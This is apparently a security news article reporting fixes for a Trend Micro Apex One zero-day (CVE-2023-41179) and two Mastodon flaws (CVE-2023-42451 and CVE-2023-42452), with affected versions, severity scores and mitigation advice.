Mastodon has taken action to resolve two vulnerabilities, specifically CVE-2023-42451 and CVE-2023-42452. Additionally, a zero-day vulnerability, denoted as CVE-2023-41179, has been swiftly addressed in TrendMicro’s Endpoint Security product, Apex One.
Urgent Zero-Day Vulnerability in TrendMicro Apex One: CVE-2023-41179
CVE-2023-41179 has a critical severity rating, boasting a CVSS score of 9.1, and has been actively exploited by attackers for remote code execution.
The CVE-2023-41179 vulnerability impacts the following products:
- Trend Micro Apex One 2019
- Trend Micro Apex One SaaS 2019
- Worry-Free Business Security 10.0 SP1
- Worry-Free Business Security Services 10.0 SP1
CVE-2023-41179 is located within a third-party uninstaller module that comes bundled with TrendMicro Apex One, whether it’s the on-premises or SaaS version.
In the case of Worry-Free Business Security and Worry-Free Business Security Services, this module vulnerability could be exploited by an attacker to gain remote code execution capabilities.
If you cannot implement the updates right away, it’s advisable to secure the administration console by limiting access. You can achieve this by only allowing connections from trusted networks through whitelisting.
Vulnerabilities in Mastodon: CVE-2023-42451, CVE-2023-42452
Mastodon, an open-source social network comprising independent servers and communities, operates with a post structure reminiscent of Twitter (X). It has garnered acclaim within the security community for its potential as a viable alternative to Twitter.
In recent developments, Mastodon has taken steps to rectify two notable vulnerabilities: CVE-2023-42451 and CVE-2023-42452, effectively reducing the potential risks associated with domain spoofing and XSS (Cross-Site Scripting) attacks. Further information on these vulnerabilities is provided below:
CVE-2023-42451 (CVSS: 7.4, High Severity):
This vulnerability impacts versions earlier than 3.5.14, 4.0.10, 4.1.8, and 4.2.0-rc2. It enables attackers to exploit a domain name normalization problem under specific circumstances. By exploiting this vulnerability, malicious actors can falsify domains that they don’t possess.
CVE-2023-42452 (CVSS: 6.1, Medium Severity):
This vulnerability impacts versions within the 4.x branch prior to 4.0.10, 4.2.8, and 4.2.0-rc2. It enables attackers to manipulate the translation feature, allowing them to bypass server-side HTML sanitization. This, in turn, could potentially lead to unescaped HTML execution in the user’s browser. Successful exploitation requires a user to click the “Translate” button on a malicious post.
The NVD states that Mastodon’s Content Security Policy (CSP) blocks inline scripts, which helps reduce the impact. However, it’s crucial to highlight that CSP can’t prevent DOM-based XSS attacks, which CVE-2023-42452 is.
To safeguard against CVE-2023-42451 and CVE-2023-42452 vulnerabilities, it’s recommended to upgrade to version 4.1.8. You can find additional information about the updates in the GitHub changelog.